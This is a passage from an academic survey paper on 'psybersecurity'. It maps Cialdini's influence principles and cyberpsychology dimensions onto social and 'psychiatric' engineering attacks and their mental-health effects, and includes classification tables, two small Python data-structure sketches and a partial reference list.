relationship plus connections between PE and SE from an interdisciplinary perspective. We project PE as an attack vector that banks on disrupting an individual’s health and in which the psychiatric part focuses on the diagnosis, treatment, and prevention of mental, emotional, and behavioral disorders. Note that we mainly focus on interdisciplinary works on SE that include a cyberpsychology viewpoint. We aim to explore how PE and SE are linked and related to PSA from the cyberpsychology standpoint, and to lay a foundation for researchers who are interested in exploring these intersections. To our knowledge, there has been no prior detailed survey study or systematization of knowledge paper on the emerging area of psybersecurity or on the interdisciplinary topics around it. We attempt to fill this research gap by carrying out a first-of-its-kind survey study on psybersecurity-related topics.
Table 1. This summarizes the relationship between cybersecurity and psychology
Cybersecurity | Psychology
Is the protection of information/data, assets, services, and systems of value to reduce the probability of loss, damage/corruption, compromise, or misuse to a level commensurate with the value assigned [31] | The scientific study of mind and behavior [33, 37, 39]
The use of psychological manipulation to trick people into disclosing sensitive information or inappropriately granting access to a secure system [32] | Cognitive psychology involves studying internal mental processes - things that go on inside your brain, including perception, thinking, memory, attention, language, problem-solving, and learning [34]
2 Causes of Psybersecurity Attacks (PSA)

2.1 PSA Attack Vectors

Attack vectors are methods cybercriminals use to gain unauthorized access to a system [7, 8, 30, 31].

• Psychiatric Engineering (PE): An attack vector that relies heavily on an individual’s health and in which the psychiatric part focuses on the diagnosis, treatment, and prevention of mental, emotional, and behavioral disorders [1, 41–43]. Existing literature associates PE with the potential threat of a psybersecurity attack (PSA). This threat is described as one that can severely impact a victim’s mental health through a carefully engineered PSA. For example, a PE attack that is carefully engineered to manipulate an individual’s mind can cause symptoms to be misunderstood, leading to an altered psychiatric evaluation and assessment and, in turn, to wrong and unfair treatment. A psychiatric care provider can be misled in this way while trying to provide the victim with a proper diagnosis and, without knowing it, become part of a well-orchestrated PE attack (intended to cause mental harm by manipulating the victim’s mind) through a misguided treatment process (Fig. 3). As a PSA, PE can be compared and related to common SE attacks in terms of the attacker’s awareness of the human mind’s flaws and weaknesses and of the manipulative tactics used to exploit victims.
• Social Engineering (SE): An attack vector that relies heavily on human interaction and often involves manipulating people into breaking standard security procedures and best practices to gain unauthorized access to systems, networks, or physical locations, or for financial gain [6, 12, 15, 30]. To conceal their identities and motives, threat actors use social engineering techniques and present themselves as trusted individuals or information sources. The objective is to influence, manipulate, or trick users into releasing sensitive information or granting access within an organization. Many SE exploits rely on people’s willingness to be helpful or their fear of punishment [13, 14, 23].

Fig. 3. This diagram outlines the schematic process of PE, as cited in references [1, 41, 42]

We study and analyze both PE and SE, probing into their relationships and connections, as summarized in Table 2.

Table 2. This summarizes the relationship between PE and SE
Psychiatric Engineering (PE) | Social Engineering (SE)
Is an attack vector that relies heavily on an individual’s health and in which the psychiatric part focuses on the diagnosis, treatment, and prevention of mental, emotional, and behavioral disorders | Is an attack vector that relies heavily on human interaction and often involves manipulating people into breaking standard security procedures and best practices to gain unauthorized access to systems, networks, or physical locations or for financial gain
This concept of a PE is distinct from a technologically orchestrated social engineering attack | Both PE and SE have common links to psychology and behavioral sciences
2.2 Attack Target

We next discuss the “people problem” in cybersecurity. Cybersecurity defenses and attack methods are evolving rapidly, but humans are not. Therefore, nearly all cyberattacks are based on exploiting human nature, and this is the “people problem”. A targeted attack is any malicious attack aimed at a specific individual, company, system, or software. It may extract information, disturb operations, infect machines, or destroy data on a target machine [7, 8, 30, 31]. For cybercriminals, targeting people makes sense: it is faster, easier, and more profitable than targeting systems. In addition, attackers exploit human nature with diversionary tactics, such as creating a false sense of urgency or impersonating trusted people. Individuals with different personalities vary in the degree to which they may fall prey to social or psychiatric engineering manipulations.
2.3 Cialdini’s Principles of Psychiatric and Social Engineering

While examining the manipulation methods employed by cybercriminals or hackers, the works of Dr. Robert Cialdini [3–5] are never far from view. Cialdini is recognized worldwide for his research on the psychology of influence. His seminal work “Influence: Science and Practice” identifies and describes six principles that influence the behavior of others. These are known as the principles of Liking, Social Proof, Rule of Reciprocation, Commitment and Consistency, Authority, and Scarcity.

Cialdini’s first principle, liking, refers to the fact that people are more likely to comply with requests made by people they like. On the psychiatric side, it is associated with the mirroring effect. Mirroring is a subconscious occurrence that can create a feeling of comfort and draws us to people who are like us. When employed consciously, it plays a major role in getting to know someone and establishing a level of comfort with one another [19, 27]. Liking is associated with Physical Attractiveness, Similarity, Compliments, Contact and Cooperation, and Conditioning and Association. On the social engineering side, person-to-person interaction plays a significant role here. Attacks under “person-to-person social engineering” involve the victim and the attacker interacting directly or in person. The attacker uses deceptive techniques to prey on the victim’s gullibility or behavioral weakness and abuses the victim’s confidence [13].

The second principle is social proof, which implies that people tend to place more trust in things endorsed by people they trust. The psychiatric side of social proof is well explained by the bandwagon effect, a psychological phenomenon in which people do something primarily because other people are doing it, regardless of their own beliefs, which they may ignore or override.
Social proof is the tendency of people to align their thoughts and behaviors with a group, also called herd mentality. For example, advertisers often tell us that their product, such as a car or an album, is the “largest selling” to get us to trust them [23, 25]. On the social engineering side, all attack vectors that do not involve the physical presence of the attacker are categorized as person-to-person via media attacks. Text, voice, and video are the three types of media considered in the taxonomy [15].

The third principle is the rule of reciprocation, under which people feel obligated to pay back what they have received from others. The rule of reciprocation involves three main psychological terms: intention, empathy, and credibility. For a kind and helpful gesture to be credible, a person must perceive in it a clear intention to do good, with no hidden interest behind it. Likewise, people must feel empathy, as only then can they build the basis of a reciprocal deed. Finally, reciprocity affects the other person because it is credible rather than false. Reciprocity would not be so significant without three factors, which are discussed next [17, 20]. The first factor is generalized reciprocity, which involves exchanges within families or among friends. The second, balanced reciprocity, consists of calculating the value of the exchange and expecting the favor to be returned within a specified time frame. The third, negative reciprocity, happens when one party to the exchange tries to get more out of it than the other. The classic scheme of “something for something” is well known [13, 14]. In social engineering, a quid pro quo exchange manipulates a person’s desire
to reciprocate favors. Quid pro quo attacks are based on manipulation and abuse of trust. They fall within the same family of SE techniques as phishing (including spear phishing and whaling attacks), baiting, and pretexting [24].

The fourth principle is commitment and consistency, according to which people tend to stick with whatever they have already chosen. In psychology, this is explained by confirmation bias, the tendency to look for information that supports, rather than rejects, one’s preconceptions, typically by interpreting evidence to confirm existing beliefs while rejecting or ignoring any conflicting data [21, 27]. On the social engineering side, one standard method is for the attacker to pretend to be new to the system and in need of assistance gaining access. The role of a new person (or ‘newbie’ or ‘neophyte’) is easy for a potential hacker to pull off. The hacker can easily pretend not to know much about a system and still retrieve information. This ruse is commonly used when the attacker cannot research enough about the company or find enough information to get a foot in the door [29, 30].

The fifth principle is authority, where people follow others who appear to know what they are doing. Judgment heuristics means using the most straightforward method to answer or approach something and complying with what is available. We can take Asch and Milgram’s experiments as an example. The line-judgment experiment tested the importance of surrounding people in the decision-making process. The participants sit around a table; among them are actors hired by the researchers, and the main subject sits at the end of the table. However, the main subject is unaware of being the only real subject in the experiment. After the experiment starts, the participants are shown four lines, one on the left and three on the right. They are then asked which of the lines on the right is equal in length to the line on the left.
In the first two rounds, the actors give the correct answer, and when it comes to the actual subject, he also gives the correct answer. After the third round, the actors confidently start giving wrong answers. Although some subjects did not go along with the group at first and gave correct answers, it was observed that the subjects’ answers eventually changed, as they felt obliged to conform to the group. The reason why the subjects felt the need to conform has also been debated by researchers. Some argue that people do this not because they desire to conform to the group, but because they want to avoid conflict [28]. On the social engineering side, executives respect authorities such as legal entities. In a well-known whaling attack, many executives were tricked into opening infected PDF files that looked like official subpoenas [15, 29].

The last principle is scarcity, in which people are drawn to things that are perceived to be exclusive. Social engineers may use scarcity to create a sense of urgency in decision-making. This urgency can often lead to manipulation of the decision-making process, allowing the social engineer to control the information provided to the victim. “Only five items left in stock!” is one of the most common examples [29, 30]. People value their freedom, and reactance theory emphasizes this simple but significant fact. When this freedom of choice is threatened, people tend to engage in motivated behavior to reassert and regain that freedom, which pushes them to act in a certain way even if they do not want to [18, 25].

Overall, in this section, we discuss Cialdini’s renowned principles, which are traditionally associated with SE attacks, as we intend to explore these principles as elements that are also related to PE attacks, given that they can be linked
to PE. In summary, as we further study the anatomy of PSA, which can be in the form of PE and SE attacks, we need to consider Cialdini’s principles and use them to analyze causal reasons behind a potential PSA. After this causal analysis of PSA, we next take a look at the effects of PSA - the aftermath.
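The pairings described in Sect. 2.3 can be collected into a small lookup structure for reference. The following is a minimal Python sketch and not part of the surveyed literature: the names `Principle`, `PRINCIPLES`, and `lookup` are hypothetical, and the short labels are paraphrases of the psychological concept and the social engineering example that this section associates with each principle.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Principle:
    """One of Cialdini's six principles as paired in Sect. 2.3 (labels are paraphrases)."""
    name: str
    psychological_concept: str  # psychiatric-side concept named in the text
    se_example: str             # social engineering example named in the text


# Hypothetical summary table; the order follows the order of discussion in the section.
PRINCIPLES = (
    Principle("Liking", "mirroring effect", "person-to-person social engineering"),
    Principle("Social Proof", "bandwagon effect", "person-to-person via media attacks"),
    Principle("Rule of Reciprocation", "intention, empathy, and credibility", "quid pro quo exchange"),
    Principle("Commitment and Consistency", "confirmation bias", "posing as a newcomer who needs help"),
    Principle("Authority", "judgment heuristics", "whaling with fake official subpoenas"),
    Principle("Scarcity", "reactance theory", "false sense of urgency"),
)


def lookup(name: str) -> Principle:
    """Return the principle with the given name, ignoring case."""
    for principle in PRINCIPLES:
        if principle.name.lower() == name.lower():
            return principle
    raise KeyError(name)


if __name__ == "__main__":
    for p in PRINCIPLES:
        print(f"{p.name}: {p.psychological_concept} -> {p.se_example}")
```

A tuple of frozen records is used here only because the six principles form a fixed, ordered list; any mapping type would serve equally well.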
3 The Effects of Psybersecurity Attacks (PSA)

“Psybersecurity” is a sparsely used term in the existing literature [1, 11, 40–43], but the threat to mental health, i.e., the risk of disruption to a victim’s psychological well-being, has existed for as long as cybersecurity attacks have been around. The Association for Psychological Science explains that human behavior and technology are equally central to cybersecurity attacks, and hackers therefore consider different psychological aspects of the people they attack. The current literature indicates that individuals with higher aggression, depression, or anxiety are the most targeted people. Such people are at greater risk from cyber-attacks given their volatile mental states and fallible dispositions. Studying the factors behind their risky and insecure behavior can help us understand the impact attacks can have on them. People with mental illnesses might have a higher vulnerability to cybercrimes. This group includes individuals with severe psychiatric conditions and senior citizens, who have become victims of several kinds of online financial fraud, hacking, and other cybercrimes that have caused financial problems and led to mental stress. Some mental illnesses include Emotional Trauma, Guilt and Shame, Feelings of Helplessness, Eating Disorders, and Sleep Disorders [5, 8]. In addition, as individuals increasingly engage with the world through technology, research on online behavior has also increased. There have been investigations of how people behave in cyberspace versus face-to-face and of the relationship between personality characteristics and a range of online behaviors, such as social media preferences and use, dating activity, cybersecurity measures, and online bullying.
In short, our survey of existing research literature related to the impact of cyber-attacks [5, 8, 36] has led us to noteworthy findings that can be summarized into the following list, which we sum up as potential effects of PSA:
• Mental illnesses like Emotional Trauma, Guilt, Shame, Feelings of Helplessness
• Eating and Sleep Disorders, plus Stress
• Vigilance Disrupts
• Personality Transformations
• Culture Impacts
4 Cyberpsychology and its Dimensions

Earlier in Sect. 1 of this paper, we discussed the relationship between cybersecurity and psychology, as noted in Table 1. We now explore the confluence of these two topics in an intersectional context as cyberpsychology, as a follow-up to our earlier section. When interacting with online devices, we extend our psyche or persona to them. Thus, they reflect our personalities, beliefs, and lifestyles. The online world blurs the barrier
between mind-space and machine-space [10, 36]. We also experience this as being between ourselves and the non-self. It serves as a venue for discovering our identity, interests, desires, expressions, creativity, and aggressive or addictive acts in negative cases. Suler outlines eight dimensions of cyberpsychology architecture (as displayed in Fig. 4), that help define our interactions with virtual spaces [10]. These dimensions are Identity, Social, Interactive, Text, Sensory, Temporal, Reality, and Physical. Figure 4 below lists these dimensions and highlights them as a reference framework for our survey study.
Fig. 4. This lists the eight (8) dimensions of cyberpsychology, as described in reference [10]
5 Summarizing and Classifying Literature: Survey Study Results 1

We now reach the section of this work where we describe a significant contribution and the first set of noteworthy results from our survey study. One of the foremost contributions of this paper is the listing and discussion of existing literature relevant to the interdisciplinary area of psybersecurity. We study several related publications and classify them into three notable categories, as seen earlier in Fig. 1 in Sect. 1 of this paper. Figure 1 visually depicts and summarizes the main contribution of our work. We now discuss further details from the information viewpoint of Fig. 1. We next present the main contributions of these surveyed publications in reverse chronological order, starting from the latest published works (going by the year of publication), in Table 3. This table represents one of the main outcomes of our survey study. It lists the related literature surveyed by us, describes each cited reference, and classifies each into one or more of the following three (3) categories: psybersecurity related, social engineering focused, and cyberpsychology themed. Table 3, shown next, is a highlight of this paper and a notable contribution of our survey study.
Table 3. This showcases a detailed description and classification of the publications surveyed and cited by us, with category 1 as Psybersecurity Related, category 2 as Social Engineering Focused, and category 3 as Cyberpsychology Themed. An ‘x’ mark indicates that a surveyed and cited publication ‘belongs to the corresponding category 1, 2 or 3’ Cited reference
Publication year
Description of work
1
2
3
[20]
2022
Discusses the answer to the following research question: Why do we feel compelled to return favors?
[24]
2022
Defines and discusses quid pro quo attacks
[34]
2022
Describes how cognitive psychology is the science of how we think
x
[26]
2022
Shows what mirroring is and explains reactance theory better
x
[29]
2022
Provides social engineering related info and educational resources
[1]
2021
Briefly discusses psybersecurity as an emerging topic, and explains how it is connected to social engineering plus behavioral sciences
[6]
2021
Provides a detailed definition and description of social engineering
[17]
2021
Explains and discusses the laws of psychological reciprocity
x
[22]
2021
Discusses why cognitive biases and heuristics lead to an under-investment in cybersecurity
x
[28]
2021
Describes Asch and Milgram’s experiments in social psychology
x
[27]
2020
Discusses how confirmation bias works
x
[41–43]
2020
Introduces the topic of psybersecurity and explains the relationship between mental health and cybersecurity
x
x
x
x
x
x
x
x
[11]
2020
Briefly introduces the concept of psybersecurity as the intersection between computer security and psychology
x
[36]
2020
Discusses human cognition through the lens of social engineering
[9]
2020
Discusses the impact of the COVID pandemic on cyber psychological issues like cyberchondria and other health anxiety
x
[38]
2020
Discusses the driving forces of unverified information (COVID infodemic roots) and cyberchondria during the COVID pandemic
x
[8]
2019
Explains why humans are a growing target for cyberattacks and what to do about them
x
[23]
2019
Discusses the relation between social engineering and exploitation development
x
[21]
2018
Discusses Cialdini’s book on his six principles of influence
[40]
2017
Explains the term psybersecurity and discusses the relationship between hacking and behavioral sciences
[12]
2017
Describes social engineering using the Kali Linux operating system
[33]
2017
Discusses psychology as a science of subject and comportment, beyond the mind and behavior
x
[18]
2017
Explains the scarcity principle and discusses examples
x
x
x
x
x x
x
[4]
2017
Discusses the impact of Cialdini’s principles on cybersecurity
x
x
[10]
2016
Discusses the eight dimensions of cyberpsychology architecture
x
[32]
2016
Describes the social psychology of cybersecurity
x
[3]
2016
Introduces the six (6) principles of influence and persuasion (reciprocity, consistency, social proof, liking, authority and scarcity)
[35]
2015
Discusses positive psychiatry
[19]
2014
Describes seven (7) examples of the liking principle
[2]
2014
Discusses psychology’s insight into human nature, which has a vital role to play in mitigating risks
x
[5]
2013
Describes the six (6) psychological elements behind sophisticated cyberattacks
x
[13]
2013
Discusses social engineering in the context of Cialdini’s psychology of persuasion and personality traits
[16]
2012
Describes how liking someone affects the human brain’s processing
[15]
2011
Presents a taxonomy for social engineering attacks
x
[30]
2006
Discusses methods of hacking in social engineering
x
[25]
2004
Describes the effect of social behaviors and discusses how this impacts society, along with the motivational analysis of social behavior by building on Jack Brehm’s contributions to psychology
x
x
x x
x
x
x
x
x
[14]
2000
Summarizes psychology principles (Cialdini’s work) in relation to social engineering
x
x
6 Analyzing Psybersecurity Attacks (PSA): Survey Study Results 2
This section presents the second set of results from our survey study, summarized in Tables 4 and 5. Psychology has a crucial role in mitigating the risk of PSA through its insight into human nature. The shift of focus from technology to psychology is logical because even the most sophisticated security systems remain incapable of preventing people from falling victim to social engineering and thus risking financial and social loss [2]. In this context, our study dissects a psybersecurity attack (PSA). A summary of this dissection-based analysis was presented in Fig. 2, shown earlier in Sect. 1 of this paper. Tables 4 and 5 describe Fig. 2 in more detail. In these tables, we analyze PSA originating from psychiatric engineering (PE) and social engineering (SE) using the following layers:
• causal elements and attack vector components, taken from Cialdini’s principles and their components, along with examples aligned with the attack vectors that are instrumental behind PE and SE, as explained earlier.
• cyberpsychology dimensions, which are based upon the cyberpsychology architectural components referenced from existing literature, as discussed earlier.
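As an illustration only, the two analysis layers listed above could be captured in a small data structure. The sketch below assumes hypothetical names (`Dimension`, `CausalEntry`, `by_dimension`, `ENTRIES`) that do not come from the surveyed literature. The principles, attack vectors, and examples are copied from Table 5, whereas the dimension sets attached to them are placeholders chosen for demonstration and are not the markings of Tables 4 and 5.

```python
from dataclasses import dataclass
from enum import Enum


class Dimension(Enum):
    """The eight cyberpsychology dimensions named in the text [10]."""
    IDENTITY = "Identity"
    SOCIAL = "Social"
    INTERACTIVE = "Interactive"
    TEXT = "Text"
    SENSORY = "Sensory"
    TEMPORAL = "Temporal"
    REALITY = "Reality"
    PHYSICAL = "Physical"


@dataclass(frozen=True)
class CausalEntry:
    """One row of the layered analysis (hypothetical representation)."""
    origin: str          # "PE" (psychiatric engineering) or "SE" (social engineering)
    principle: str       # Cialdini principle acting as the PSA cause
    attack_vector: str   # linked attack vector component
    example: str         # causal component or example
    dimensions: frozenset = frozenset()  # mapped cyberpsychology dimensions


def by_dimension(entries, dimension):
    """Return the entries that map to the given cyberpsychology dimension."""
    return [entry for entry in entries if dimension in entry.dimensions]


# Row labels are taken from Table 5; the dimension sets are ASSUMED
# placeholders for demonstration, not the 'x' marks of the original table.
ENTRIES = [
    CausalEntry(
        origin="SE",
        principle="Principle of scarcity",
        attack_vector="Reactance theory",
        example="Hurry limited time offer",
        dimensions=frozenset({Dimension.TEMPORAL}),
    ),
    CausalEntry(
        origin="SE",
        principle="Rule of reciprocation",
        attack_vector="Quid pro quo",
        example="Abuse of trust",
        dimensions=frozenset({Dimension.SOCIAL, Dimension.INTERACTIVE}),
    ),
]

if __name__ == "__main__":
    for entry in by_dimension(ENTRIES, Dimension.SOCIAL):
        print(entry.principle, "->", entry.attack_vector)
```

A frozen dataclass with a `frozenset` keeps each row immutable and hashable, so rows can be grouped or deduplicated once the actual dimension markings are filled in from the tables.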
Table 4. Causal and dimensional analysis of PE as PSA - left side shows linked principles of Cialdini and their components as causes with related attack vector examples. Right side shows which of the 8 cyberpsychology dimension(s) the left elements map to. An ‘x’ mark indicates ‘left elements map to the corresponding cyberpsychology dimension’
PSA causes
PSA attack vector
Cyberpsychology dimensions
Psychiatric engineering (PE)
Causal components and examples
Physical Social Identity Interactive Text Sensory Temporal Reality
Principle of liking [5, 16, 27] Mirroring effect [26]
Physical attractiveness [19, 25]
x
Similarity [19, 25]
x
Compliments [19, 25]
x
Contact and cooperation [19, 25]
x
x
Conditioning-association [19, 25]
x
Social proof [5, 13, 14] Bandwagon effect [23, 25]
Advertisers often tell us that their product is the “largest selling” car, an album [23, 25]
x
Rule of reciprocation [5, 17] Intention, empathy, credibility [13, 14, 17]
Generalized [20, 21, 25]
x
Balanced [20, 21, 25]
x
Negative [20, 21, 25]
x
Commitment and consistency [5, 21] Confirmation Bias [27]
x
Principle of Authority [5, 13, 14] Judgment heuristics [13, 14, 25]
Asch and Milgram’s experiments [28]
Principle of scarcity [5, 18, 25] Decisions [3–5, 25]
Only five items left in stock [18, 25]
x
x
x
x
x
x
x
x
x
x
x
Table 5. Causal and dimensional analysis of SE as PSA - left side shows linked principles of Cialdini and their components as causes with related attack vector examples. Right side shows which of the 8 cyberpsychology dimension(s) the left elements map to. An ‘x’ mark indicates ‘left elements map to the corresponding cyberpsychology dimension’
PSA causes
PSA attack vector
Cyberpsychology dimensions
Social engineering (SE)
Causal components and examples
Physical Social Identity Interactive Text Sensory Temporal Reality
Principle of liking [5, 16, 27] Person To person [5, 13, 14, 25]
Impersonation [16, 25]
x
Social proof [5, 13, 14] Person-person via media [5, 13, 14, 25]
Person-Person via text [16, 25]
x
Person-person via voice [16, 25]
x
x
Person-Person via video [16, 25]
x
x
Rule of reciprocation [5, 17] Quid pro quo [24]
x
Manipulation [20, 21, 25]
x
Abuse of trust [20, 21, 25]
x
Commitment and consistency [5, 21] Foot in-the-door technique [13, 14, 25]
x
x
x
x
x
x
x
Principle of authority [5, 13, 14]
Whaling [15, 25]
x
x
Principle of scarcity [5, 18, 25] Reactance theory [26]
Hurry limited time offer [18, 19, 25]
x
x
x
x
x
x
x
x
x
7 Psybersecurity Amidst the COVID Pandemic
During the current COVID pandemic, tension, stress, social distancing, lockdown-driven isolation, and economic recession have all risen dramatically, and so have hackers’ opportunities to exploit others. Cybersecurity attacks are being orchestrated around individual weaknesses related to face masks, preventative care, stimulus checks, and unemployment issues [1, 9, 38]. Recent social engineering attacks, including internet fraud, online scams, phishing, and vishing, reflect hackers’ growing awareness of human vulnerabilities during the COVID outbreak. In addition, the ongoing pandemic has placed health at the forefront of media coverage, and individually prompted healthcare research has risen dramatically. People are turning to the internet for critical healthcare information, including information on COVID and other diseases, as well as information on healthcare providers and medical professionals that influences their healthcare-related decision-making. The spread of misinformation, which has accelerated during the COVID pandemic, has led the World Health Organization (WHO) to refer to this issue as an “infodemic”, and combating it has emerged as a new area of research. This implies that the risk of psybersecurity attacks (PSA) is also increasing. According to an online survey, since 2020 there has been an 85.2% increase in online healthcare searches, which correlates with the rise of health anxiety and other cyberpsychological issues [1, 9, 38]. This correlation indicates a need for proper guidance, advice, and awareness for the average online healthcare information (OHI) user. These may include tools that verify the authenticity and trustworthiness of online data, including the credibility of websites and information sources. Additionally, transparent, user-friendly measures for website evaluation and trust-inducing web design elements will help enhance user reliability. Thus, in this context, psybersecurity needs to be considered by OHI providers as an important area for future research and development.
8 Future Scope of Work and Potential Research Directions
With 1,473 reported cybersecurity breaches and over 164.68 million sensitive records exposed in the United States alone [1], the aftermath of these cyber-attacks extends beyond the technical repercussions: these incidents also translate into psybersecurity attacks (PSA) that can seriously affect mental health by bringing about changes in mood, emotion, and behavior. Thus, the emerging field of psybersecurity is now tasked with securing people’s mental health, which includes protecting human psychological well-being from the psychiatric consequences of technology usage and involves studying mental health attack targets and vectors within the field of human security. There are several prospective directions of work in this area, and one of the most relevant is within the healthcare field. In this context, consider the case for authentication-based information assurance techniques and technologies that help safeguard users’ mental health by enabling them to understand and better identify psybersecurity threats. This process includes discerning between trustworthy and untrustworthy online healthcare information (OHI) users and websites.
In addition to studying psybersecurity-related psychological and behavioral components and planning technological interventions, building a robust human-security network would add more protection to people’s psychological well-being. In this context, Dr. Louie regards education and awareness of psybersecurity risks as integral to analyzing personal mental health. Moreover, building a strong community of individuals who check on each other’s mental states would also help identify behavior changes and possibly prevent the need for the psychological assessments, treatments, or responses required after a psybersecurity attack incident. In summary, the following are open questions and research angles that we put together for the community in relation to future directions and scope of work:
Research Question 1: How can we design and develop effective defense mechanisms and systems that enable people to protect both their data and their mental health from cybersecurity attacks?
Research Question 2: How can the government and/or healthcare providers increase public awareness and educate average users to protect themselves from psybersecurity attacks as well as cybersecurity breaches?
Research Question 3: How can cognitive psychology help in the defense against psybersecurity attacks, as well as in the fight against the ongoing “infodemic”?
Research Question 4: What psychological concepts, interdisciplinary theories, and other multi-disciplinary reference frameworks can better assist in an improved analysis of the causes and effects of psybersecurity attacks?
Research Question 5: What new or existing threat models and/or threat modeling approaches can be successfully used to investigate psybersecurity attacks?
Research Question 6: How should vulnerable people, such as those diagnosed with mental illness, trauma, or other cyberpsychological issues, be treated after exposure to cybersecurity breaches, as well as after being subjected to psybersecurity attacks? What preventive and reactive measures can be used in this regard?
9 Conclusion and Summary
Psybersecurity is a relatively new term within the research literature and represents an emerging area concerned with studying the threat posed by cybersecurity attacks on the human mind, and the corresponding risk mitigation process. In today’s digital world, each of us uses technology for one task or another. This exposes all technology users to a high risk of psybersecurity attacks resulting from a cybersecurity breach or the consumption of misinformation. Psybersecurity is an emerging topic within human security, and because research in this area is still at an early stage, it offers a wide scope for future work. To our knowledge, this is a first-of-its-kind system of knowledge paper - a survey study of the existing research literature related to this emerging field of psybersecurity. We envision that this survey study, along with its outcomes, will provide the foundations for future reference and further explorations in this emerging topic and research area. These outcomes include our compiled list of open research questions, our listing and classification of relevant literature into notable categories, and our unique analyses of a psybersecurity attack from the interdisciplinary contexts of Cialdini’s principles, the corresponding social engineering-related attack vector components, and the cyberpsychological domains. We hope that this work benefits readers as a useful information resource related to psybersecurity, and also paves the path forward towards further interdisciplinary research work. We believe that future research work on psybersecurity is much needed and would go a long way towards safeguarding people’s psychological well-being from attacks.
References
1. Franklin, C., Chattopadhyay, A.: Psybersecurity: a new emerging topic and research area within human security. IEEE Technol. Policy Ethics 6, 1–4 (2021). https://cmte.ieee.org/futuredirections/tech-policy-ethics/march-2021/psybersecurity-part1/
2. Wiederhold, B.: The role of psychology in enhancing cybersecurity. Psychology - Semantic Scholar (2014). https://www.semanticscholar.org/paper/The-Role-of-Psychology-in-Enhancing-Cybersecurity-Wiederhold/391c01487a3b0fab56f079a21e9d8dd551327bb3
3. Schawbel, D., Cialdini, R.: How to master the art of ‘pre-suasion’ (2016). https://www.forbes.com/sites/danschawbel/2016/09/06/robert-cialdini-how-to-master-the-art-of-pre-suasion/
4. James, B.: The impact of the six principles of influence on cybersecurity (2017). https://www.linkedin.com/pulse/impact-six-principles-influence-cybersecurity-james-beary-aca
5. Poulin, C.: 6 psychological elements behind sophisticated cyber-attacks (2013). https://securityintelligence.com/sophisticated-cyber-attacks-6-psychological-elements/
6. Rosencrance, L., Bacon, M.: What are social engineering attacks? (2021). https://www.techtarget.com/searchsecurity/definition/social-engineering
7. Techopedia: What is a targeted attack? - definition from Techopedia. http://www.techopedia.com/definition/76/targeted-attack
8. Elgan, M.: Why humans are a growing target for cyberattacks - and what to do about it (2019). https://securityintelligence.com/articles/why-humans-are-a-growing-targetfor-cyberattacks-and-what-to-do-about-it/
9. Jungmann, S.M., Michael, W.: Health anxiety, cyberchondria, and coping in the current COVID-19 pandemic: which factors are related to coronavirus anxiety? J. Anxiety Disord. 73 (2020). https://doi.org/10.1016/j.janxdis.2020.102239. https://pubmed.ncbi.nlm.nih.gov/32502806/
10. Suler, J.: The eight dimensions of cyberpsychology architecture: overview of a transdisciplinary model of digital environments and experiences (2016). https://www.researchgate.net/publication/298615100_The_Eight_Dimensions_of_Cyberpsychology_Architecture_Overview_of_A_Transdisciplinary_Model_of_Digital_Environments_and_Experiences
11. Streff, J.: PsyberSecurity: where computer security meets psychology (2020). https://issuu.com/ilbankersassoc/docs/sept_oct_2020_web/s/11169723
12. Breda, F., Barbosa, H., Morais, T.: Social engineering and cyber security. In: INTED Proceedings (2017). https://www.researchgate.net/publication/315351300_SOCIAL_ENGINEERING_AND_CYBER_SECURITY
13. Quiel, S.: Social engineering in the context of Cialdini’s psychology of persuasion and personality traits (2013). https://tore.tuhh.de/handle/11420/1126
14. Gibson, D.: Social engineering principles. Get Certified Get Ahead blog (2000). https://blogs.getcertifiedgetahead.com/social-engineering-principles/
15. Ivaturi, K., Janczewski, L.: A taxonomy for social engineering attacks. Computer Science - Semantic Scholar (2011). https://www.semanticscholar.org/paper/A-Taxonomy-for-SocialEngineering-attacks-Ivaturi-Janczewski/fa433cf4d784c16bff7c824f304f071ce6b0da58
16. Hsu, C.: Liking someone affects how your brain processes the way they move (2012). https://www.medicaldaily.com/liking-someone-affects-how-your-brain-processes-way-they-move242947
17. Sabater, V.: The law of psychological reciprocity (2021). https://exploringyourmind.com/thelaw-of-psychological-reciprocity/
18. Cherry, K.: What is the scarcity principle? (2017). https://www.explorepsychology.com/scarcity-principle/
19. Hum, S.: Laws of attraction: 7 examples of the liking principle (2014). https://www.referralcandy.com/blog/liking-principle
20. Cherry, K.: Why do we feel compelled to return favors? (2022). https://www.verywellmind.com/what-is-the-rule-of-reciprocity-2795891
21. Fessenden, T.: The principle of commitment and behavioral consistency. Online Website Forum - World Leaders in Research-Based User Experience (2018). https://www.nngroup.com/articles/commitment-consistency-ux/
22. Ting, D.: Why cognitive biases and heuristics lead to an under-investment in cybersecurity (2021). https://dting01.medium.com/why-cognitive-biases-and-heuristics-lead-to-anunder-investment-in-cybersecurity-e41215253d90
23. Pandey, P., Mishra, S., Rai, P.: Social engineering and exploit development (2019). https://www.academia.edu/42013795/Social_Engineering_and_Exploit_Development
24. Nadeem, M.S.: Social engineering: quid pro quo attacks (2022). https://blog.mailfence.com/quid-pro-quo-attacks/
25. Wright, R.A., Greenberg, J., Brehm, S.S., Brehm, J.W.: Motivational analyses of social behavior: building on Jack Brehm’s contributions to psychology. Psychology Press (2004). https://www.amazon.com/Motivational-Analyses-Social-Behavior-Contributions/dp/0805842667
26. Mackey, J.: What is mirroring, and what does it mean for your marriage? (2022). https://www.brides.com/story/what-is-mirroring-and-what-does-it-mean-for-your-marriage
27. Noor, I.: How confirmation bias works (2020). https://www.simplypsychology.org/confirmation-bias.html
28. Gürel, G.: Asch and Milgram experiments: Social Psychology (2021). https://mozartcultures.com/en/asch-and-milgram-experiments-social-psychology/
29. Security Through Education: The Official Social Engineering Hub. Social Engineer, LLC (2022). https://www.social-engineer.org/
30. Janwar, I.: Methods of hacking - social engineering (2006). https://www.academia.edu/4903480/Methods_of_Hacking_Social_Engineering
31. Dunn, M., Dunn, M.: Cyber-security: 19: the Routledge handbook of new security studies (2010). https://www.taylorfrancis.com/chapters/edit/10.4324/9780203859483-19/cybersecurity-myriam-dunn-cavelty
32. McAlaney, J., Thackray, H., Taylor, J.: The social psychology of cybersecurity (2016). https://www.bps.org.uk/psychologist/social-psychology-cybersecurity
33. Pérez-Álvarez, M.: Psychology as a science of subject and comportment, beyond the mind and behaviour. Integr. Psychol. Behav. Sci. 52, 25–51 (2017). https://pubmed.ncbi.nlm.nih.gov/29063995/
34. Cherry, K.: Cognitive psychology is the science of how we think. Verywell Mind (2022). https://www.verywellmind.com/cognitive-psychology-4157181
35. Jeste, D.V.: Positive psychiatry: its time has come. PubMed (2015). https://pubmed.ncbi.nlm.nih.gov/26132670/
